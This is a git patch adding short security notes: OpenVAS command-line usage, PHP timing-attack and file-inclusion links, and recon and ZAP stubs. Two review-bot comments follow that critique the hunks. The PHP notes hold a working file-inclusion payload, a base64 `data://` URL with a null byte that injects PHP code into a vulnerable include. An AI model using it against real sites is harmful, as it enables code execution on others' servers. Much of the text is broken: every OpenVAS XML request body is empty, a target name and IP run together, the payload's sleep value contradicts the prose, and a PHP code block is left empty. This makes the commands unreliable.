From 58cfb1c6884e96e21d4cfe51efaf688ae0bfd7fe Mon Sep 17 00:00:00 2001 From: Andres Hermosilla Date: Wed, 6 Sep 2017 16:40:11 -0700 Subject: [PATCH] Added security guides on openvas, php, recon & zap --- security-openvas.md | 52 +++++++++++++++++++++++++++++++++++++++++++++ security-php.md | 41 +++++++++++++++++++++++++++++++++++ security-recon.md | 8 +++++++ security-zap.md | 11 ++++++++++ 4 files changed, 112 insertions(+) create mode 100644 security-openvas.md create mode 100644 security-php.md create mode 100644 security-recon.md create mode 100644 security-zap.md diff --git a/security-openvas.md b/security-openvas.md new file mode 100644 index 0000000..a6028c6 --- /dev/null +++ b/security-openvas.md 
@@ -0,0 +1,52 @@ +# Security - OpenVAS + +### CLI +```shell +# XML handling utils to make life easier +apt-get install -y libxml2-utils + +# List all targets +omp -u admin -w admin --xml='' + +# Create a target +omp --xml='Docker - Local192.168.99.101' + +# Confirm target was added +omp --xml='' + +# Get tasks running +omp --xml='' + +# Get config listings of types of scans +omp --pretty-print --xml='' + +# Create a task +omp --xml='ScanWebserver' + +# Start the task +omp --pretty-print -xml='' + +# Get detailed info on the task +omp --pretty-print --xml='' + +# Get report formats +omp --xml='' | grep -i -A4 '[a-z]+)' + +# Output the report +omp --pretty-print --xml='' > report.xml +xmllint --xpath 'string(/get_reports_response/report)' report.xml | head -n -16 | base64 --decode > report.csv +``` + +## Links +- https://github.com/mikesplain/openvas-docker +- https://www.linuxquestions.org/questions/linux-networking-3/openvas-create-new-tasks-from-omp-4175511045/ +- https://elastic-security.com/2013/07/18/automation-of-vulnerability-assessments-with-openvas/ +- https://pypi.python.org/pypi/openvas.omplib +- https://github.com/hay/xml2json/new/master +- https://isc.sans.edu/forums/diary/Automating+Vulnerability+Scans/20685/ +- http://blog.identityautomation.com/managing-infrastructure-with-rapididentity-part-5-performing-openvas-vulnerability-scans +- https://www.digitalocean.com/community/tutorials/how-to-use-openvas-to-audit-the-security-of-remote-systems-on-ubuntu-12-04 +- https://www.nopsec.com/blog/docker-based-openvas-scanning-cluster-improve-scope-scalability/ +- https://www.linode.com/docs/security/install-openvas-on-ubuntu-16-04 +- https://joedsweb.wordpress.com/2017/02/11/openvas-nagiosplugin/ +- https://www.coveros.com/automating-security-with-devops-it-can-work/ \ No newline at end of file diff --git a/security-php.md b/security-php.md new file mode 100644 index 0000000..e26bd57 --- /dev/null +++ b/security-php.md 
@@ -0,0 +1,41 @@ +### Security - PHP + +## Timing Attacks +- https://paragonie.com/blog/2015/11/preventing-timing-attacks-on-string-comparison-with-double-hmac-strategy +- http://blog.ircmaxell.com/2014/11/its-all-about-time.html +- https://github.com/pentestmonkey/timing-attack-checker + +## Inclusion +- http://php.net/manual/en/function.include.php +- Don't forget about the null byte! `%00` +- https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ +- https://upshell.wordpress.com/2011/06/11/new-vulnerabilities-to-access-files-in-php/ + +Sometimes PHP is so terribly configured you can inject your code into the inclusion. +Here is an example of how you can pass a `sleep(10);` into a possible `include` which +would cause the page load to be delayed by ~10s if the page did indeed and a vulernable +input & include combo. + +`index.php?file=data://text/plain;base64,PD9waHAgc2xlZXAoMzApOw==%00` + +#### Recon +If you can inject your code into PHP includes, below is an example of a file system walker to list all files in the current directory. + +```php +
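Review bot: In the "Start the task" command of the security-openvas.md hunk, `omp --pretty-print -xml=''` uses a single dash for `-xml` while every other call uses `--xml`, so it is not the same option and the command will not run as intended; change it to `--xml`. Three further points in the same hunk: the `omp -u admin -w admin` line passes the credentials on the command line, where they end up in shell history and are visible to other users through the process list, so the guide should steer readers to a protected config file or an interactive prompt rather than the default admin/admin pair; every `--xml=''` argument in the diff is empty (the XML request bodies appear to have been lost, which also explains `Docker - Local192.168.99.101` running the target name and host together), so none of the listed commands are reproducible as written and the request bodies need to be restored; and `head -n -16` in the report extraction hard-codes the number of trailing lines to strip before `base64 --decode`, which breaks as soon as the response layout changes, so extract the report element text with `xmllint --xpath` alone and decode that. Finally, the heading levels run `#`, `###`, `##`, which nests "CLI" below "Links" instead of beside it.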
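Review bot: The security-php.md hunk says the example passes `sleep(10);` and delays the page by ~10s, but the base64 in `index.php?file=data://text/plain;base64,PD9waHAgc2xlZXAoMzApOw==%00` decodes to `<?php sleep(30);`, so the text and the payload disagree; make the two consistent. The same paragraph has a typo ("vulernable") and a broken sentence ("if the page did indeed and a vulernable input & include combo"), which should read along the lines of "if the page did indeed have a vulnerable input and include combination". Because this is a guide, the hunk should also state the conditions the check depends on and the matching fix: the `data://` wrapper only works in `include` when `allow_url_include` is enabled, and the `%00` null-byte truncation it mentions was closed in PHP 5.3.4, so readers know which configurations are affected and what to harden. The heading levels are inverted as well (`### Security - PHP` as the title above `## Timing Attacks`), and the `#### Recon` section ends with an opened ```php fence and no file walker code, so either the snippet was never committed or the hunk is truncated.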